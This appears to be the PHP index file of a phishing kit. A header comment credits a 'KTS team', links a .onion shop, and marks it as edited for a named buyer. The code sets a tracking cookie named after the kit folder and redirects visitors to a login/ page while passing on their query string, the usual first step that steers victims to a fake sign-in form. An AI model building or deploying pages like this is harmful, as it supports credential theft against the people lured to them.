<?php /* 
   
Page made by KTS team;
http://o54eavgyktxh5wts.onion/shop/;
Edited for  RandomUnknown@WQeqwe  on  Tue 8 Dec 2020 05:32:29 EET 
*/ ?>
<?php 



setcookie("bid", basename(__dir__),time() + (86400 * 30), "/");
header("location:login/?".$_SERVER['QUERY_STRING']);

 ?>